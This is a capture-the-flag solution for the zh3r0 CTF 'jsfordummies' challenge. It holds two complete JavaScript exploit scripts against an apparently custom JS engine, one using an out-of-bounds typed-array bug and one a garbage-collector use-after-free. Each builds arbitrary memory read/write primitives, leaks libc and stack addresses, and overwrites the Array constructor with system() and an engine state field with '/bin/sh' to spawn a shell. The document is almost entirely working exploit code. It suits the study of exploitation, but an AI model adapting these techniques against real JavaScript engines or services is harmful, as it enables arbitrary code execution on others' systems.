zh3r0 ctf - jsfordummies

exp1.js

/*
Bug: typecasting uint8_t* ab.backingStore to uint16_t* ta.mem while converting ArrayBuffer to Uint16Array,
but not reducing length, allows oob r/w.

Exploit: create ArrayBuffer of same size as JSObject, so that they come consecutively in memory,
use oob r/w to overwrite JSObject metadata, construct arbitrary r/w primitives, overwrite
Array constructor with system, JSState with "/bin/sh"
*/

test = new ArrayBuffer(0x70);
a = new Uint16Array(0x20);
b = new Uint16Array(test);

vals = new Array(0x70);
for(i = 0; i < 65535; i++) {
    j = b.Includes(i);
    if(j){
        vals[j] = i;
    }
}

function leak(vals, off){
    return vals[off] + (vals[off+1]*0x10000) + (vals[off+2]*0x100000000);
}

heap_leak = leak(vals, 0x44)
code_leak = leak(vals, 0x3c)

offset = 0x48
vals2 = new Array(0x10);
function read(addr){
    addr = addr - 2;
    b.set(offset, addr % 0x10000);
    b.set(offset + 1, (addr / 0x10000) % 0x10000);
    b.set(offset + 2, addr / 0x100000000);
    for(i = 0; i < 65535; i++) {
        j = a.Includes(i);
        if(j){
            vals2[j] = i;
        }
    }
    return leak(vals2, 1);
}

function write(addr, value){
    b.set(offset, addr % 0x10000);
    b.set(offset + 1, (addr / 0x10000) % 0x10000);
    b.set(offset + 2, addr / 0x100000000);
    a.set(0, value % 0x10000);
    a.set(1, (value / 0x10000) % 0x10000);
    a.set(2, (value / 0x100000000) % 0x100000000);
}

libc_base = read(code_leak - 0x290) - 0x18cba0;

one_gadget = libc_base + 0xe6c81;
environ = libc_base + 0x1ef2e0;
system = libc_base + 0x55410;
array_obj = heap_leak + 0x2760;

stack = read(environ) - 0x188;
js_state = read(stack);

binsh1 = 0x732f6e69622f
binsh2 = 0x68

write(js_state, binsh1);
write(js_state + 6, binsh2);
write(array_obj + 0x30, system);
a = new Array(0);

exp2.js

/*
Bug: UAF in gc, frees UInt32Array->u.ta.mem when freeing UInt32Array, but memory can still be in use

Exploit: create 2 Uint32Arrays with an ArrayBuffer's backing store (of JSObject size) and free one,
then get JSObject allocation in that memory and overwrite metadata, rest same as above.
*/

test = new ArrayBuffer(0x70);
a = new Uint32Array(test);
b = new Uint32Array(test);

delete a;
gc();

c = new Uint32Array(0x20);
d = new Uint32Array(0x20);
e = new Uint32Array(0x20);
f = new Uint32Array(0x20);
g = new Uint32Array(0x20);
h = new Uint32Array(0x20);


function leak(buf, off){
    return buf.at(off) + buf.at(off+1)*0x100000000;
}

code_leak = leak(b, 2);
heap_leak = leak(b, 6);

function read(addr){
    b.set(8, addr % 0x100000000);
    b.set(9, (addr / 0x100000000) % 0x100000000);
    return leak(h, 0);
}

function write(addr, value){
    b.set(8, addr % 0x100000000);
    b.set(9, addr / 0x100000000);
    h.set(0, value % 0x100000000);
    h.set(1, (value / 0x100000000) % 0x100000000);
}

array_obj = heap_leak + 0x26f0
libc_base = read(code_leak - 0x118) - 0x24bc0 - 0x25000
environ = libc_base + 0x1ef2e0;
system = libc_base + 0x55410;

stack = read(environ) - 0x188;
js_state = read(stack);

binsh1 = 0x732f6e69622f
binsh2 = 0x68

write(js_state, binsh1);
write(js_state + 6, binsh2);
write(array_obj + 0x30, system);
a = new Array(0);